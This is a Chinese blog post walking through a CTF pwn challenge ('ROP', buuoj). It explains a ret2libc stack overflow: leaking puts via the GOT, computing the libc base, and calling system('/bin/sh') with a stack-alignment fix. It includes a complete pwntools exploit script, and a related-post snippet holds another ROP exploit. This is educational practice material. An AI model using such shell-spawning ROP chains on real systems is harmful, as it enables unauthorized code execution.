buuoj [第六章 CTF之PWN章]ROP

最新推荐文章于 2023-08-02 15:01:30 发布
最新推荐文章于 2023-08-02 15:01:30 发布
阅读量984 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/112913804
版权

ret2libc

保护。
在这里插入图片描述
啥没有。
在这里插入图片描述直接就溢出了,但是没后门函数,就通过puts函数泄露puts函数地址,计算libc基地址,找到system函数与’/bin/sh’, 然后一把梭就好。
在这里插入图片描述需要用到gadget。

在调试过程中发现最后会出问题,然后gdb.attach贴上以后开始调。

在这里插入图片描述这个地方其实已经看出来了,进入了system函数,rdi也是‘/bin/sh’,似乎没啥问题,但是下面就卡住了。

在这里插入图片描述
这个地方卡住是因为没有栈对齐,你可以看到此时rsp是78,但是他要求16位对齐,最后得是0,所以需要在system地址前面加上个ret。

具体的看下面的wp

exp

from pwn import*

context.log_level = "debug"

#r = remote('node3.buuoj.cn', 28222)
r = process('./rop')

elf = ELF('./rop')
libc = ELF('./libc-2.271.so')

gdb.attach(r)

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

pop_rdi = 0x4005d3
main_addr = 0x400537
ret_addr = 0x400562

r.recvline()

payload = 'a' * 18 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

r.sendline(payload)
#print(r.recvline())
puts_addr = u64(r.recv(6).ljust(8, '\x00'))
#puts_addr = u64(r.recvuntil('\n')[:-1].ljust(8,'\x00'))
print hex(puts_addr)

libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search('/bin/sh').next()
print hex(libc_base)
print hex(system_addr)
print hex(bin_sh)
info("libc:0x%x",libc_base)

payload = 'a' * 18 + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
#payload = 'a' * 18 + p64(pop_rdi) + p64(bin_sh) + p64(ret_addr) + p64(system_addr)
r.sendline(payload)

r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1662
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
CTF buuoj pwn-----第9题:jarvisoj_level2
bing_Max的博客
09-27 751
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .
BUUCTF PWN 刷题 1-15题
农夫果园好好喝的博客
08-21 2047
经典栈溢出漏洞。
buuctf pwn rip 1,rop解法
amber_o0k的博客
11-07 1149
from pwn import * io = remote('node4.buuoj.cn', 27175) pop_rdi_ret=0x4011fb bin_sh=0x40201b syscall=0x401040 ret=0x401016 payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall) io.sendline(payload) io.interactive() 这个解法有点复杂了,强行构造了一波rop。.
[BUUCTF-pwn]——[第六章 CTFPWN]stack
Y_peak的博客
03-12 695
[BUUCTF-pwn]——[第六章 CTFPWN]stack 题目地址: https://buuoj.cn/challenges#[%E7%AC%AC%E5%85%AD%E7%AB%A0%20CTF%E4%B9%8BPWN%E7%AB%A0]stack 思路 一个简单的栈溢出, 注意栈平衡就好 exploit from pwn import * p = remote('node3.buuoj.cn',25385) shell = 0x0000000000400537 ret = 0x0000000
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
CTF PWN 武器库题
12-12
6. **ROP(Return-Oriented Programming)**:如果ASLR(地址空间布局随机化)等防御机制开启,可能需要利用ROP技术来绕过这些防护,找到合适的gadgets来构造控制流。 7. **调试技巧**:使用GDB等调试工具,分析...
信息安全_CTFPWN题目实例分析.pptx
08-14
"CTFPWN 题目实例分析" CTFPWN 题目实例分析是指在 Capture The Flag(CTF)比赛中,PWN 题目类别的实例分析。PWN 题目是 CTF 比赛中的一种常见题目类型,涉及到二进制漏洞的利用和内存相关的安全问题。 ...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
pwn入门题目+exp
最新发布
01-26
初级的ROP,附有完整exp,可以学一下
buuctf|pwn-[HarekazeCTF2019]baby_rop-wp
l2645470582_的博客
11-08 212
1.例行检查 我们看到该文件开启了堆保护 2.我们用64位的IDA打开该文件 按shift+f12查看关键字符串,我们看到“/bin/sh”这个关键字符串 我们双击查看它的位置:0x0601048 3.我们去main函数里面看看 我们发现v4 = var_10,他的地址为:0x10 我们要拿到权限:system("/bin/sh") 所以我们要找到system地址:0x0400490 我们双击_system,system在plt表里面 4...
BUUCTF-PWN-inndy_rop
Rt1Text的博客
03-05 334
可以栈溢出,没有system函数,使用系统调用利用ROPgadget的功能直接利用程序中的片段拼凑rop链。
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 412
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
[BUUCTF]PWN——inndy_rop
mcmuyanga的博客
11-26 1273
inndy_rop 附件 步骤: 例行检查,32位,开启了nx保护 本地调试运行没看出个啥,直接上ida,一开始f5会报错, 找到报错提示的位置,点击option–>general调出如图的界面,勾选上stack pointar 看到堆栈不平衡,选中报错地址的上一行,右击,点击“change stack"跳出如图界面,在sp值前加个”–“即可 然后就能f5反编译了,main里就一个overflow函数,存在溢出漏洞 右边的函数列表里只有静态编译的结果,所以这题没法去泄露libc什么的 这
buuctf babyrop
carol2358的博客
04-08 570
pwn菜鸡争取一天写一道吧,记录一下做题过程,方便复现 先checksec ida f5 大致的流程就是先生成一个随机数,然后将这个随机数放入buf,再把buf传到71F 在71F里,buf变成a1,把a1放入s,然后往71F的buf里输入数据,这一步要注意,我们要做的是通过传入数据,把v5覆盖掉,因为返回值是v5,而v5和buf的关系在stack里是这样的 所以我们传入7个以上的字节(...
BUUCTF:picoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1183
BUUCTF:picoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
刷题 - BUUCTF(BUUOJ) - PWN - DAY3
qq_36902977的博客
08-02 143
buuoj/buuctf pwn 刷题
栈溢出的第一步进阶——ROP返回导向编程
XJJ的博客
05-01 723
前面两次栈溢出只是让我们学习原理,是最简单、最基本的栈溢出问题,一般的pwn题不会这么简单,溢出一次就可以到位。今天我们就做第一步进阶,正式进入ROP。 就我目前理解的ROP,就是要通过连续多次栈溢出,利用其原有的gadget(可以叫做代码片段),构造一次系统调用,调用execve()函数,就相当于获得了一个shell。首先我们要知道,系统调用的中断号是0x80,而execve的功能号是11,也就是16进制的0xb。所以在进行系统调用(即执行INT 80H这条语句)之前,我们先要构造出调用execve()
BUUCTF (PWN) RIP详细分析
热门推荐
qy201706的博客
04-08 1万+
很简单的栈溢出,不过对于栈溢出具体过程不理解的会卡的很惨; 由于初学嘛,就看了网上的wp,好像都是之前版本的,现在用就不太对,可能我入坑BUUCTF比较晚,现在用的题都是运行在Ubuntu18上的,故需要考虑堆栈平衡~~
ctf 简单pwn题资源
08-09
CTF 简单 PWN 题资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单题目。这些题目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取题目提供的关键信息或获取系统控制权。 CTF 简单 PWN 题目的资源可以在各种在线平台上找到,例如 CTF 竞赛中常用的CTFd、pwnable.kr 和 picoCTF 等。这些平台提供了大量不同难度的 PWN 题目,从初学者到专业选手都能找到适合自己水平的题目。 此外,还有一些开源项目和教程可以帮助学习简单 PWN 题目的解决方法。例如,pwntools 是一个功能强大的 Python 库,提供了一系列与二进制漏洞利用相关的工具和函数。还有一些博客和视频教程,介绍了从入门级到高级级别的 PWN 解题技巧和常见漏洞的利用方式。 总结来说,CTF 简单 PWN 题目资源是指为了提高参赛者在 PWN 领域的技能而准备的一些简单的二进制漏洞利用题目。这些资源可以通过在线平台、开源项目和教程找到,对于想要在 CTF 竞赛中取得好成绩或提高网络安全技能的人们来说都是非常有价值的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值